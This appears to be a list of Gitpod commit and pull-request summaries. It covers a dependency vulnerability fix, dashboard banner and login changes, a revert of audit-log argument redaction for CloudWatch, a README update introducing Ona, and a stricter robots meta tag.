- yarn.lock
[server] Fix vulnerability
Fixes CLC-1761
<ul>
<li><b>🏷️ Name</b> - pd-clc-1761</li>
<li><b>🔗 URL</b> - <a href="https://pd-clc-1761.preview.gitpod-dev.com/workspaces" target="_blank">pd-clc-1761.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - pd-CLC-1761-gha.33731</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-pd-clc-1761%22%0A%0A--%20Filter%20on%20service:%0A--%20jsonPaylo …
> [server] Fix vulnerability

- README.md
- components/dashboard/src/AppNotifications.tsx
- components/dashboard/src/Login.tsx
- components/dashboard/src/OnaRightPanel.tsx
- components/dashboard/src/start/OnaBanner.tsx
- components/dashboard/src/workspaces/BlogBanners.tsx
> Cute little message

- components/server/src/audit/AuditLogService.ts
Customer reported that commit b007b1dca broke their audit monitoring setup by redacting args in CloudWatch logs (`/aws/containerinsights/meta/audit`). This has created security concerns as they've lost visibility into admin actions.
Commit b007b1dca redacted args in the container logs (via `log.info()`) to prevent sensitive data exposure, but this affected customers who rely on CloudWatch for audit trail monitoring.
Revert the args redaction to restore audit visibility in CloudWatch logs. The original audit database logs were never affected and continue to work properly.
- ✅ Restores audit visibility for customers using CloudWatch monitoring
- ✅ Maintains compliance and security monitoring capabilities
Fixes customer complaint about missing args in CloudWatch audit logs.
Co-authored-by: …
> Revert audit log args redaction to restore CloudWatch visibility

- README.md
* Simplifies README
* Introduces Ona
* Adds links/mentions of sunset of classic
Before/after:
> Update README with sunset details and Ona introduction

- components/dashboard/src/Login.tsx
fixes ([internal discussion](https://gitpod.slack.com/archives/C046Z4BBP2N/p1758026348228049?thread_ts=1758019645.148459&cid=C046Z4BBP2N))
> cleanup Gitpod PAYG login CTAs

- components/dashboard/public/index.html
Changes
```
<meta name="robots" content="noindex">
```
to
```
<meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noimageindex">
```
Fixes CLC-1947
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [dashboard] robots-meta: noindex -> noindex, nofollow, noarchive, nosnippet, noimageindex
